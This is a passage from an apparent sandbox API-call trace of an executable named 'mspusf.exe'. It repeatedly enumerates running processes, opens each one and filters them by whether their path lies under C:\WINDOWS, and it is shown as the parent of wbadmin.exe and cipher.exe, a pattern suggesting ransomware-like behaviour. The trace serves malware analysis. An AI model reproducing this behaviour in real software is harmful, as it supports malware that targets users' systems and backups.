th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0124.192] GetCurrentProcessId () returned 0xf00 [0124.192] GetCurrentProcess () returned 0xffffffff [0124.192] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.192] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xb60) returned 0x508 [0124.192] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe" (normalized: "c:\\windows\\systemapps\\microsoft.windows.cortana_cw5n1h2txyewy\\searchui.exe")) returned 0x4a [0124.192] StrStrIW (lpFirst="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe" [0124.192] CloseHandle (hObject=0x508) returned 1 [0124.192] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0124.192] GetCurrentProcessId () returned 0xf00 [0124.192] GetCurrentProcess () returned 0xffffffff [0124.192] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.192] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xbe4) returned 0x508 [0124.193] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\RuntimeBroker.exe" (normalized: "c:\\windows\\system32\\runtimebroker.exe")) returned 0x25 [0124.193] StrStrIW (lpFirst="C:\\Windows\\System32\\RuntimeBroker.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\RuntimeBroker.exe" [0124.193] CloseHandle (hObject=0x508) returned 1 [0124.193] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0124.193] GetCurrentProcessId () returned 0xf00 [0124.193] GetCurrentProcess () returned 0xffffffff [0124.193] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.193] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xe0c) returned 0x0 [0124.193] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0124.194] GetCurrentProcessId () returned 0xf00 [0124.194] GetCurrentProcess () returned 0xffffffff [0124.194] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.194] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1168) returned 0x0 [0124.194] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.196] GetCurrentProcessId () returned 0xf00 [0124.196] GetCurrentProcess () returned 0xffffffff [0124.196] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.196] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1240) returned 0x0 [0124.196] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0124.197] GetCurrentProcessId () returned 0xf00 [0124.197] GetCurrentProcess () returned 0xffffffff [0124.197] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.197] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x12d4) returned 0x508 [0124.197] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe")) returned 0x21 [0124.197] StrStrIW (lpFirst="C:\\Windows\\System32\\taskhostw.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\taskhostw.exe" [0124.197] CloseHandle (hObject=0x508) returned 1 [0124.197] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0124.201] GetCurrentProcessId () returned 0xf00 [0124.201] GetCurrentProcess () returned 0xffffffff [0124.201] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.201] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x130c) returned 0x0 [0124.201] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x135c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x130c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0124.202] GetCurrentProcessId () returned 0xf00 [0124.202] GetCurrentProcess () returned 0xffffffff [0124.202] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.202] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x135c) returned 0x0 [0124.202] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mspusf.exe")) returned 1 [0124.202] GetCurrentProcessId () returned 0xf00 [0124.202] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x704, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0124.203] GetCurrentProcessId () returned 0xf00 [0124.203] GetCurrentProcess () returned 0xffffffff [0124.203] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.203] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x704) returned 0x508 [0124.203] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")) returned 0x1f [0124.203] StrStrIW (lpFirst="C:\\Windows\\System32\\conhost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\conhost.exe" [0124.203] CloseHandle (hObject=0x508) returned 1 [0124.203] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0124.204] GetCurrentProcessId () returned 0xf00 [0124.204] GetCurrentProcess () returned 0xffffffff [0124.204] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.204] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xafc) returned 0x0 [0124.204] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0124.204] GetCurrentProcessId () returned 0xf00 [0124.204] GetCurrentProcess () returned 0xffffffff [0124.204] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.204] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xf24) returned 0x0 [0124.204] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 1 [0124.205] GetCurrentProcessId () returned 0xf00 [0124.205] GetCurrentProcess () returned 0xffffffff [0124.205] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.205] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x6ec) returned 0x0 [0124.205] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0124.205] GetCurrentProcessId () returned 0xf00 [0124.205] GetCurrentProcess () returned 0xffffffff [0124.205] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.205] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1234) returned 0x0 [0124.206] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="wbadmin.exe")) returned 1 [0124.206] GetCurrentProcessId () returned 0xf00 [0124.206] GetCurrentProcess () returned 0xffffffff [0124.206] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.206] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1208) returned 0x508 [0124.206] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\wbadmin.exe" (normalized: "c:\\windows\\system32\\wbadmin.exe")) returned 0x1f [0124.206] StrStrIW (lpFirst="C:\\Windows\\System32\\wbadmin.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\wbadmin.exe" [0124.206] CloseHandle (hObject=0x508) returned 1 [0124.206] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cipher.exe")) returned 1 [0124.207] GetCurrentProcessId () returned 0xf00 [0124.207] GetCurrentProcess () returned 0xffffffff [0124.207] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.207] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1198) returned 0x508 [0124.207] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cipher.exe" (normalized: "c:\\windows\\syswow64\\cipher.exe")) returned 0x1e [0124.207] StrStrIW (lpFirst="C:\\Windows\\SysWOW64\\cipher.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\SysWOW64\\cipher.exe" [0124.207] CloseHandle (hObject=0x508) returned 1 [0124.207] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1208, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0124.208] GetCurrentProcessId () returned 0xf00 [0124.208] GetCurrentProcess () returned 0xffffffff [0124.208] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.208] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x38c) returned 0x508 [0124.208] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")) returned 0x1f [0124.208] StrStrIW (lpFirst="C:\\Windows\\System32\\conhost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\conhost.exe" [0124.208] CloseHandle (hObject=0x508) returned 1 [0124.208] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1198, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0124.209] GetCurrentProcessId () returned 0xf00 [0124.209] GetCurrentProcess () returned 0xffffffff [0124.209] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.209] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1130) returned 0x508 [0124.209] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")) returned 0x1f [0124.209] StrStrIW (lpFirst="C:\\Windows\\System32\\conhost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\conhost.exe" [0124.209] CloseHandle (hObject=0x508) returned 1 [0124.209] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1198, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0124.209] CloseHandle (hObject=0x4c8) returned 1 [0124.209] Sleep (dwMilliseconds=0x3a98) [0134.727] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x880 [0134.740] Process32FirstW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.740] GetCurrentProcessId () returned 0xf00 [0134.740] GetCurrentProcess () returned 0xffffffff [0134.740] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.740] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0134.740] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0134.741] GetCurrentProcessId () returned 0xf00 [0134.741] GetCurrentProcess () returned 0xffffffff [0134.741] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.741] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0134.741] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0134.741] GetCurrentProcessId () returned 0xf00 [0134.741] GetCurrentProcess () returned 0xffffffff [0134.741] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.741] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x140) returned 0x0 [0134.741] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0134.742] GetCurrentProcessId () returned 0xf00 [0134.742] GetCurrentProcess () returned 0xffffffff [0134.742] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.742] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x198) returned 0x0 [0134.742] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0134.742] GetCurrentProcessId () returned 0xf00 [0134.742] GetCurrentProcess () returned 0xffffffff [0134.743] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.743] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0134.743] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0134.743] GetCurrentProcessId () returned 0xf00 [0134.743] GetCurrentProcess () returned 0xffffffff [0134.743] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.743] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0134.743] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0134.744] GetCurrentProcessId () returned 0xf00 [0134.744] GetCurrentProcess () returned 0xffffffff [0134.744] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.744] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x220) returned 0x0 [0134.744] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0134.744] GetCurrentProcessId () returned 0xf00 [0134.744] GetCurrentProcess () returned 0xffffffff [0134.744] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.744] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0134.744] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0134.745] GetCurrentProcessId () returned 0xf00 [0134.745] GetCurrentProcess () returned 0xffffffff [0134.745] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.745] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x244) returned 0x0 [0134.745] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.745] GetCurrentProcessId () returned 0xf00 [0134.745] GetCurrentProcess () returned 0xffffffff [0134.745] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.745] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x2a4) returned 0x0 [0134.746] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0134.746] GetCurrentProcessId () returned 0xf00 [0134.746] GetCurrentProcess () returned 0xffffffff [0134.746] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.746] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0134.746] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0134.747] GetCurrentProcessId () returned 0xf00 [0134.747] GetCurrentProcess () returned 0xffffffff [0134.747] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.747] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x2b4) returned 0x0 [0134.747] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, 